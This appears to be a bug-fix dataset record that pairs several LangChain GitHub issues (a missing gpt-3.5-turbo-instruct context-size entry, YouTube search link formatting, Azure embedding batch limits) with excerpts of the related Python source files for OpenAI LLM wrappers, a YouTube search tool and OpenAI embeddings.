async for chunk in self._astream(
_prompts[0], stop, run_manager, **kwargs
):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
choices.append(
{
"text": generation.text,
"finish_reason": generation.generation_info.get("finish_reason")
if generation.generation_info
else None,
"logprobs": generation.generation_info.get("logprobs")
if generation.generation_info
else None,
}
)
else:
response = await acompletion_with_retry(
self, prompt=_prompts, run_manager=run_manager, **params
)
choices.extend(response["choices"])
update_token_usage(_keys, response, token_usage)
return self.create_llm_result(choices, prompts, token_usage)
    def get_sub_prompts(
        self,
params: Dict[str, Any],
prompts: List[str],
stop: Optional[List[str]] = None,
) -> List[List[str]]:
"""Get the sub prompts for llm call."""
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
if params["max_tokens"] == -1:
if len(prompts) != 1:
raise ValueError(
"max_tokens set to -1 not supported for multiple inputs."
)
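            # max_tokens == -1 means "use all remaining context": compute the exact token budget for this prompt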
params["max_tokens"] = self.max_tokens_for_prompt(prompts[0])
sub_prompts = [
prompts[i : i + self.batch_size]
for i in range(0, len(prompts), self.batch_size)
]
return sub_prompts
    def create_llm_result(
        self, choices: Any, prompts: List[str], token_usage: Dict[str, int]
) -> LLMResult:
"""Create the LLMResult from the choices and prompts."""
generations = []
for i, _ in enumerate(prompts):
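            # each prompt produced self.n completions; take this prompt's slice of the choices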
sub_choices = choices[i * self.n : (i + 1) * self.n]
generations.append(
[
Generation(
text=choice["text"],
generation_info=dict(
finish_reason=choice.get("finish_reason"),
logprobs=choice.get("logprobs"),
),
)
for choice in sub_choices
]
)
llm_output = {"token_usage": token_usage, "model_name": self.model_name}
return LLMResult(generations=generations, llm_output=llm_output)
@property
    def _invocation_params(self) -> Dict[str, Any]:
        """Get the parameters used to invoke the model."""
openai_creds: Dict[str, Any] = {
"api_key": self.openai_api_key,
"api_base": self.openai_api_base,
"organization": self.openai_organization,
}
if self.openai_proxy:
import openai
            openai.proxy = {"http": self.openai_proxy, "https": self.openai_proxy}  # type: ignore[assignment]  # noqa: E501
return {**openai_creds, **self._default_params}
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
    def _llm_type(self) -> str:
        """Return type of llm."""
return "openai"
def get_token_ids(self, text: str) -> List[int]:
"""Get the token IDs using the tiktoken package."""
        # tiktoken NOT supported for Python < 3.8
        if sys.version_info[1] < 8:
return super().get_num_tokens(text)
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_num_tokens. "
"Please install it with `pip install tiktoken`."
)
model_name = self.tiktoken_model_name or self.model_name
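        # resolve the tiktoken encoding for this model; unknown names fall back to cl100k_base below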
try:
enc = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
enc = tiktoken.get_encoding(model)
return enc.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
@staticmethod
    def modelname_to_contextsize(modelname: str) -> int:
        """Calculate the maximum number of tokens possible to generate for a model.
Args:
modelname: The modelname we want to know the context size for.
Returns:
The maximum context size
Example:
.. code-block:: python
max_tokens = openai.modelname_to_contextsize("text-davinci-003")
"""
model_token_mapping = {
"gpt-4": 8192,
"gpt-4-0314": 8192,
"gpt-4-0613": 8192,
"gpt-4-32k": 32768,
"gpt-4-32k-0314": 32768,
"gpt-4-32k-0613": 32768,
"gpt-3.5-turbo": 4096, |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | "gpt-3.5-turbo-0301": 4096,
"gpt-3.5-turbo-0613": 4096,
"gpt-3.5-turbo-16k": 16385,
"gpt-3.5-turbo-16k-0613": 16385,
"text-ada-001": 2049,
"ada": 2049,
"text-babbage-001": 2040,
"babbage": 2049,
"text-curie-001": 2049,
"curie": 2049,
"davinci": 2049,
"text-davinci-003": 4097,
"text-davinci-002": 4097,
"code-davinci-002": 8001,
"code-davinci-001": 8001,
"code-cushman-002": 2048,
"code-cushman-001": 2048,
}
        # handling finetuned models
if "ft-" in modelname:
modelname = modelname.split(":")[0]
context_size = model_token_mapping.get(modelname, None)
if context_size is None:
raise ValueError(
f"Unknown model: {modelname}. Please provide a valid OpenAI model name."
"Known models are: " + ", ".join(model_token_mapping.keys())
)
return context_size
@property
    def max_context_size(self) -> int:
        """Get max context size for this model."""
return self.modelname_to_contextsize(self.model_name)
def max_tokens_for_prompt(self, prompt: str) -> int:
"""Calculate the maximum number of tokens possible to generate for a prompt.
Args:
prompt: The prompt to pass into the model.
Returns:
The maximum number of tokens to generate for a prompt.
Example:
.. code-block:: python
max_tokens = openai.max_token_for_prompt("Tell me a joke.")
"""
num_tokens = self.get_num_tokens(prompt)
return self.max_context_size - num_tokens
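    # Illustration only, not part of the library source: with
    # "gpt-3.5-turbo-instruct" present in model_token_mapping above, the
    # reproduction from issue #10806 now succeeds. max_tokens=-1 flows through
    # max_tokens_for_prompt() against the model's 4096-token context instead of
    # raising ValueError. Assumes a valid OPENAI_API_KEY in the environment:
    #
    #     from langchain.llms import OpenAI
    #
    #     llm = OpenAI(
    #         temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1
    #     )
    #     print(llm("give me a list of Chinese dishes and their recipes"))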
class OpenAI(BaseOpenAI):
"""OpenAI large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import OpenAI
openai = OpenAI(model_name="text-davinci-003")
"""
@property
def _invocation_params(self) -> Dict[str, Any]:
return {**{"model": self.model_name}, **super()._invocation_params}
class AzureOpenAI(BaseOpenAI):
    """Azure-specific OpenAI large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import AzureOpenAI
openai = AzureOpenAI(model_name="text-davinci-003")
"""
deployment_name: str = ""
"""Deployment name to use."""
openai_api_type: str = ""
openai_api_version: str = ""
@root_validator()
def validate_azure_settings(cls, values: Dict) -> Dict:
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
)
values["openai_api_type"] = get_from_dict_or_env(
values, "openai_api_type", "OPENAI_API_TYPE", "azure"
)
return values
@property
    def _identifying_params(self) -> Mapping[str, Any]:
        return {
**{"deployment_name": self.deployment_name},
**super()._identifying_params,
}
@property
def _invocation_params(self) -> Dict[str, Any]:
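        # Azure routes requests by deployment name ("engine") and requires explicit api_type/api_version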
openai_params = {
"engine": self.deployment_name,
"api_type": self.openai_api_type,
"api_version": self.openai_api_version,
}
return {**openai_params, **super()._invocation_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "azure"
class OpenAIChat(BaseLLM):
"""OpenAI Chat large language models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key.
Any parameters that are valid to be passed to the openai.create call can be passed
in, even if not explicitly saved on this class.
Example:
.. code-block:: python
from langchain.llms import OpenAIChat
openaichat = OpenAIChat(model_name="gpt-3.5-turbo")
"""
client: Any
model_name: str = "gpt-3.5-turbo"
"""Model name to use.""" |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,806 | Error when using gpt-3.5-turbo-instruct: model_token_mapping is missing an entry for gpt-3.5-turbo-instruct | ### System Info
LangChain version: 0.0.295 (just upgraded to this version to use gpt-3.5-turbo-instruct)
### Who can help?
@hwchase17 @agola
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [X] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Minimal code to reproduce:
```python
# load OpenAI API Key
from langchain.llms import OpenAI
llm = OpenAI(temperature=0.1, model_name="gpt-3.5-turbo-instruct", max_tokens=-1)
llm("give me a list of Chinese dishes and their recipes")
```
Error message:
>```ValueError: Unknown model: gpt-3.5-turbo-instruct. Please provide a valid OpenAI model name.Known models are: gpt-4, gpt-4-0314, gpt-4-0613, gpt-4-32k, gpt-4-32k-0314, gpt-4-32k-0613, gpt-3.5-turbo, gpt-3.5-turbo-0301, gpt-3.5-turbo-0613, gpt-3.5-turbo-16k, gpt-3.5-turbo-16k-0613, text-ada-001, ada, text-babbage-001, babbage, text-curie-001, curie, davinci, text-davinci-003, text-davinci-002, code-davinci-002, code-davinci-001, code-cushman-002, code-cushman-001```
Cause of the error: looks like it's because the `model_token_mapping` is missing an entry for `gpt-3.5-turbo-instruct`: https://github.com/langchain-ai/langchain/blob/master/libs/langchain/langchain/llms/openai.py#L555
### Expected behavior
The code succeeds without error | https://github.com/langchain-ai/langchain/issues/10806 | https://github.com/langchain-ai/langchain/pull/10808 | 5d0493f6521a9ab8459e7dcd92828a0353e7d706 | c15bbaac3186a41bb74b314e82eb0227fdc9e332 | "2023-09-19T23:26:18Z" | python | "2023-09-20T00:03:16Z" | libs/langchain/langchain/llms/openai.py | model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
openai_api_key: Optional[str] = None
openai_api_base: Optional[str] = None
openai_proxy: Optional[str] = None
max_retries: int = 6
"""Maximum number of retries to make when generating."""
prefix_messages: List = Field(default_factory=list)
"""Series of messages for Chat input."""
streaming: bool = False
"""Whether to stream the results or not."""
allowed_special: Union[Literal["all"], AbstractSet[str]] = set()
"""Set of special tokens that are allowed。"""
disallowed_special: Union[Literal["all"], Collection[str]] = "all"
"""Set of special tokens that are not allowed。"""
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = {field.alias for field in cls.__fields__.values()}
extra = values.get("model_kwargs", {})
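        # fold any unrecognized constructor kwargs into model_kwargs so they reach the API call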
for field_name in list(values):
if field_name not in all_required_field_names:
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
extra[field_name] = values.pop(field_name)
values["model_kwargs"] = extra
return values
@root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that api key and python package exists in environment."""
openai_api_key = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
openai_api_base = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
openai_proxy = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
openai_organization = get_from_dict_or_env(
values, "openai_organization", "OPENAI_ORGANIZATION", default=""
        )
        try:
import openai
openai.api_key = openai_api_key
if openai_api_base:
openai.api_base = openai_api_base
if openai_organization:
openai.organization = openai_organization
if openai_proxy:
                openai.proxy = {"http": openai_proxy, "https": openai_proxy}  # type: ignore[assignment]  # noqa: E501
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
try:
values["client"] = openai.ChatCompletion
except AttributeError:
raise ValueError(
"`openai` has no `ChatCompletion` attribute, this is likely "
"due to an old version of the openai package. Try upgrading it "
"with `pip install --upgrade openai`."
)
warnings.warn(
"You are trying to use a chat model. This way of initializing it is "
"no longer supported. Instead, please use: "
"`from langchain.chat_models import ChatOpenAI`"
)
return values
@property
    def _default_params(self) -> Dict[str, Any]:
        """Get the default parameters for calling OpenAI API."""
return self.model_kwargs
def _get_chat_params(
self, prompts: List[str], stop: Optional[List[str]] = None
) -> Tuple:
if len(prompts) > 1:
raise ValueError(
f"OpenAIChat currently only supports single prompt, got {prompts}"
)
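        # wrap the single prompt as a user message, preceded by any configured prefix messages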
messages = self.prefix_messages + [{"role": "user", "content": prompts[0]}]
params: Dict[str, Any] = {**{"model": self.model_name}, **self._default_params}
if stop is not None:
if "stop" in params:
raise ValueError("`stop` found in both the input and default params.")
params["stop"] = stop
if params.get("max_tokens") == -1:
            # for ChatGPT api, omitting max_tokens is equivalent to having no limit
del params["max_tokens"]
return messages, params
    def _stream(
        self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> Iterator[GenerationChunk]:
messages, params = self._get_chat_params([prompt], stop)
params = {**params, **kwargs, "stream": True}
for stream_resp in completion_with_retry(
self, messages=messages, run_manager=run_manager, **params
):
token = stream_resp["choices"][0]["delta"].get("content", "")
chunk = GenerationChunk(text=token)
yield chunk
if run_manager:
run_manager.on_llm_new_token(token, chunk=chunk)
    async def _astream(
        self,
prompt: str,
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> AsyncIterator[GenerationChunk]:
messages, params = self._get_chat_params([prompt], stop)
params = {**params, **kwargs, "stream": True}
async for stream_resp in await acompletion_with_retry(
self, messages=messages, run_manager=run_manager, **params
):
token = stream_resp["choices"][0]["delta"].get("content", "")
chunk = GenerationChunk(text=token)
yield chunk
if run_manager:
await run_manager.on_llm_new_token(token, chunk=chunk)
def _generate( |
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[CallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
if self.streaming:
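# Streaming path: fold the incremental chunks into a single generation.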
generation: Optional[GenerationChunk] = None
for chunk in self._stream(prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
return LLMResult(generations=[[generation]])
messages, params = self._get_chat_params(prompts, stop)
params = {**params, **kwargs}
full_response = completion_with_retry(
self, messages=messages, run_manager=run_manager, **params
)
llm_output = {
"token_usage": full_response["usage"],
"model_name": self.model_name,
}
return LLMResult(
generations=[
[Generation(text=full_response["choices"][0]["message"]["content"])]
],
llm_output=llm_output, |
)
async def _agenerate(
self,
prompts: List[str],
stop: Optional[List[str]] = None,
run_manager: Optional[AsyncCallbackManagerForLLMRun] = None,
**kwargs: Any,
) -> LLMResult:
if self.streaming:
generation: Optional[GenerationChunk] = None
async for chunk in self._astream(prompts[0], stop, run_manager, **kwargs):
if generation is None:
generation = chunk
else:
generation += chunk
assert generation is not None
return LLMResult(generations=[[generation]])
messages, params = self._get_chat_params(prompts, stop)
params = {**params, **kwargs}
full_response = await acompletion_with_retry(
self, messages=messages, run_manager=run_manager, **params
)
llm_output = {
"token_usage": full_response["usage"],
"model_name": self.model_name,
}
return LLMResult(
generations=[
[Generation(text=full_response["choices"][0]["message"]["content"])]
], |
llm_output=llm_output,
)
@property
def _identifying_params(self) -> Mapping[str, Any]:
"""Get the identifying parameters."""
return {**{"model_name": self.model_name}, **self._default_params}
@property
def _llm_type(self) -> str:
"""Return type of llm."""
return "openai-chat"
def get_token_ids(self, text: str) -> List[int]:
"""Get the token IDs using the tiktoken package."""
# tiktoken is not supported for Python < 3.8; fall back to the base method.
if sys.version_info[1] < 8:
return super().get_token_ids(text)
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to calculate get_num_tokens. "
"Please install it with `pip install tiktoken`."
)
enc = tiktoken.encoding_for_model(self.model_name)
return enc.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
) |
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,742 | Update return parameter of YouTubeSearchTool | ### Feature request
Return the Youtube video links in full format like `https://www.youtube.com/watch?v=VIDEO_ID`
Currently the links are like `/watch?v=VIDEO_ID`
Return the links as a List like `['link1', 'link2']`
Currently it is returning the whole list as a string ` "['link1', 'link2']" `
### Motivation
If the links returned are the exact same as **direct links to YouTube, in a list** rather than a string, I can avoid the hassle of processing them again to convert to the required format.
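A minimal sketch of the intended change to `_search` (assuming the existing `youtube_search` dependency stays in place):
```python
def _search(self, person: str, num_results: int) -> list:
    # Sketch: build full, directly clickable URLs and return a real
    # list instead of str(list_of_suffixes).
    import json

    from youtube_search import YoutubeSearch

    results = YoutubeSearch(person, num_results).to_json()
    data = json.loads(results)
    return [
        "https://www.youtube.com" + video["url_suffix"]
        for video in data["videos"]
    ]
```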
### Your contribution
I will change the code a bit and pull it. | https://github.com/langchain-ai/langchain/issues/10742 | https://github.com/langchain-ai/langchain/pull/10743 | 1dae3c383ed17b0a2e4675accf396bc73834de75 | 740eafe41da7317f42387bdfe6d0f1f521f2cafd | "2023-09-18T17:47:53Z" | python | "2023-09-20T00:04:06Z" | libs/langchain/langchain/tools/youtube/search.py | """
Adapted from https://github.com/venuv/langchain_yt_tools
CustomYTSearchTool searches YouTube videos related to a person
and returns a specified number of video URLs.
Input to this tool should be a comma separated list,
- the first part contains a person name
- and the second(optional) a number that is the
maximum number of video results to return
"""
import json
from typing import Optional
from langchain.callbacks.manager import CallbackManagerForToolRun
from langchain.tools import BaseTool
class YouTubeSearchTool(BaseTool): |
"""Tool that queries YouTube."""
name: str = "youtube_search"
description: str = (
"search for youtube videos associated with a person. "
"the input to this tool should be a comma separated list, "
"the first part contains a person name and the second a "
"number that is the maximum number of video results "
"to return aka num_results. the second part is optional"
)
def _search(self, person: str, num_results: int) -> str:
from youtube_search import YoutubeSearch
results = YoutubeSearch(person, num_results).to_json()
data = json.loads(results)
url_suffix_list = [video["url_suffix"] for video in data["videos"]]
return str(url_suffix_list)
def _run(
self,
query: str,
run_manager: Optional[CallbackManagerForToolRun] = None,
) -> str:
"""Use the tool."""
values = query.split(",")
person = values[0]
if len(values) > 1:
num_results = int(values[1])
else:
num_results = 2
return self._search(person, num_results) |
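# A minimal usage sketch (hypothetical query values): the input string packs
# the search term and an optional max-result count, comma separated.
#
#     tool = YouTubeSearchTool()
#     tool.run("lex fridman,3")
#     # -> "['/watch?v=...', '/watch?v=...', '/watch?v=...']"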
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 4,575 | AzureOpenAI InvalidRequestError: Too many inputs. The max number of inputs is 1. | ### System Info
Langchain version == 0.0.166
Embeddings = OpenAIEmbeddings - model: text-embedding-ada-002 version 2
LLM = AzureOpenAI
### Who can help?
@hwchase17
@agola11
### Information
- [ ] The official example notebooks/scripts
- [X] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
Steps to reproduce:
1. Set up azure openai embeddings by providing key, version etc..
2. Load a document with a loader
3. Set up a text splitter so you get more than 2 documents
4. add them to chromadb with `.add_documents(List<Document>)`
This is some example code:
```py
pdf = PyPDFLoader(url)
documents = pdf.load()
text_splitter = CharacterTextSplitter(chunk_size=1000, chunk_overlap=0)
texts = text_splitter.split_documents(documents)
vectordb.add_documents(texts)
vectordb.persist()
```
### Expected behavior
Embeddings be added to the database, instead it returns the error `openai.error.InvalidRequestError: Too many inputs. The max number of inputs is 1. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.`
This is because Microsoft only allows one input per embedding request, while the script tries to embed all the document chunks at once.
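Until the wrapper is fixed, a common workaround (a hedged sketch — `chunk_size` is the embeddings class's existing batching knob, and the deployment name is a placeholder) is to force one input per request:
```py
from langchain.embeddings import OpenAIEmbeddings

# chunk_size=1 makes every Azure request carry a single input, avoiding
# the "Too many inputs" error at the cost of one HTTP call per chunk.
embeddings = OpenAIEmbeddings(
    deployment="your-embeddings-deployment-name",  # placeholder
    chunk_size=1,
)
```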
The following code is where the issue comes up (I think): https://github.com/hwchase17/langchain/blob/258c3198559da5844be3f78680f42b2930e5b64b/langchain/embeddings/openai.py#L205-L214
The input should be a 1-dimensional array, not multi-dimensional. | https://github.com/langchain-ai/langchain/issues/4575 | https://github.com/langchain-ai/langchain/pull/10707 | 7395c2845549f77a3b52d9d7f0d70c88bed5817a | f0198354d93e7ba8b615b8fd845223c88ea4ed2b | "2023-05-12T12:38:50Z" | python | "2023-09-20T04:50:39Z" | libs/langchain/langchain/embeddings/openai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
import numpy as np
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]: |
import openai
min_seconds = 4
max_seconds = 10
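# Retry transient OpenAI failures (timeouts, rate limits, API/connection
# errors, service unavailability) with exponential backoff between
# min/max seconds, up to embeddings.max_retries attempts.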
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any: |
import openai
min_seconds = 4
max_seconds = 10
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable: |
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
def _check_response(response: dict, skip_empty: bool = False) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
import openai
raise openai.error.APIError("OpenAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response, skip_empty=embeddings.skip_empty)
return await _async_embed_with_retry(**kwargs)
class OpenAIEmbeddings(BaseModel, Embeddings): |
"""OpenAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set with your API key or pass it
as a named parameter to the constructor.
Example:
.. code-block:: python
from langchain.embeddings import OpenAIEmbeddings
openai = OpenAIEmbeddings(openai_api_key="my-api-key")
In order to use the library with Microsoft Azure endpoints, you need to set
the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
the properties of your endpoint. |
In addition, the deployment name must be passed as the model parameter.
Example:
.. code-block:: python
import os
os.environ["OPENAI_API_TYPE"] = "azure"
os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
os.environ["OPENAI_API_VERSION"] = "2023-05-15"
os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"
from langchain.embeddings.openai import OpenAIEmbeddings
embeddings = OpenAIEmbeddings(
deployment="your-embeddings-deployment-name",
model="your-embeddings-model-name",
openai_api_base="https://your-endpoint.openai.azure.com/",
openai_api_type="azure",
)
text = "This is a test query."
query_result = embeddings.embed_query(text)
"""
client: Any = None
model: str = "text-embedding-ada-002"
deployment: str = model
openai_api_version: Optional[str] = None
openai_api_base: Optional[str] = None
openai_api_type: Optional[str] = None
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191 |
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the OpenAPI request."""
headers: Any = None
tiktoken_model_name: Optional[str] = None
"""The model name to pass to tiktoken when using this class.
Tiktoken is used to count the number of tokens in documents to constrain
them to be under a certain limit. By default, when set to None, this will
be the same as the embedding model name. However, there are some cases
where you may want to use this Embedding class with a model name not
supported by tiktoken. This can include when using Azure embeddings or
when using one of the many model providers that expose an OpenAI-like
API but with different models. In those cases, in order to avoid erroring
when tiktoken is called, you can specify a model name to use here."""
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
skip_empty: bool = False
"""Whether to skip empty strings when embedding or raise an error.
Defaults to not skipping."""
class Config: |
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict: |
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_api_type"] = get_from_dict_or_env(
values,
"openai_api_type",
"OPENAI_API_TYPE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy", |
"OPENAI_PROXY",
default="",
)
if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
default_api_version = "2022-12-01"
else:
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict: |
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
